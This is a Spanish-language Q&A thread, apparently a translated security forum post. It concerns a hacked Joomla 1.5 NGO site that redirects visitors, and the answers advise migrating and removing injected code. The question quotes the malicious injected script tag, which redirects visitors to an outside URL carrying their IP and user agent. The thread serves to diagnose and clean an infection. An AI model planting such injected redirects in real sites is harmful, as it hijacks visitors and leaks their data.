NGO Joomla! sitio: ¿Infectado con malware? Inyección de JavaScript?

Question

NGO Joomla! sitio: ¿Infectado con malware? Inyección de JavaScript?

#1 de scuzzy-delta (3 votos)
#2 de fablife (2 votos)

0

¡Por favor, ayúdenos con este sitio de ONG que ejecuta Joomla! 1.5.

No pueden pagarle a un profesional de seguridad en este momento, ¿así que quizás ustedes puedan ayudar a aislar el problema?

Si va a enlace , se le redirige a alguna página openDNS enlace

Hay una etiqueta javascript en la parte inferior de la página:

<script type="text/javascript">location.replace("http://guidetest.a.id.opendns.com/?url=www%2Ealabora%2Eorg%2Fcss%2Fstat%2Ephp%3Fip%3D186%2E115%2E71%2E1%26useragent%3Dmozilla%252F5%2E0%2B%2528x11%253B%2Blinux%2Bi686%2B%2528x86%5F64%2529%2529%2Bapplewebkit%252F537%2E36%2B%2528khtml%252C%2Blike%2Bgecko%2529%2Bchrome%252F28%2E0%2E1500%2E52%2Bsafari%252F537%2E36%26domainname%3Dcasatrespatios%2Eorg%26fullpath%3D%252F&servfail&nref");</script>

que parece ser el culpable. Este código no se encuentra en el archivo de plantilla php correspondiente. No tengo idea de cómo este código se inyecta en la página. ¿Alguien tiene una idea?

malware javascript joomla

pregunta fablife 16.12.2013 - 22:12

fuente

2 respuestas

Lea otras preguntas en las etiquetas malware javascript joomla

¿Es CISSP adecuado para un arquitecto de Java? [cerrado] ¿Cómo evitar que otros hosts en la misma LAN vean mi IP y mi nombre de host?

score 3 · Answer 1

El soporte para Joomla 1.5 LTS terminó en diciembre de 2012 . Esto generalmente significa que no se lanzarán más parches de seguridad (o cualquier otro parche de mantenimiento).

La "solución" es migrar el contenido de una buena copia de seguridad conocida a una versión de Joomla compatible, o algún otro sistema de administración de contenido actual.

Incluso si alguien aquí pudiera encontrar una solución, tendrías que migrar de todos modos, porque Joomla 1.5 no tiene soporte, por lo que es mejor que lo hagas ahora.

score 2 · Answer 2

Mis investigaciones me llevaron a este enlace: enlace

Parece que el problema está relacionado con esa información, y eliminar el código en la parte inferior etiquetado como "" Este uso del código para estadísticas globales de bots "parece haber solucionado el problema.

Raro es que los cambios de archivo para ese archivo son de 21.Julio de 2012 ... Por lo tanto, deben haberse infectado hace mucho tiempo, y nadie se dio cuenta hasta que el sitio al que se redireccionaba ya no responde o algo así. ...

En cualquier caso, sugeriré a la ONG que obtenga fondos para actualizar el sitio, a fin de estar al día con respecto a la seguridad. Gracias a todos los que intervinieron.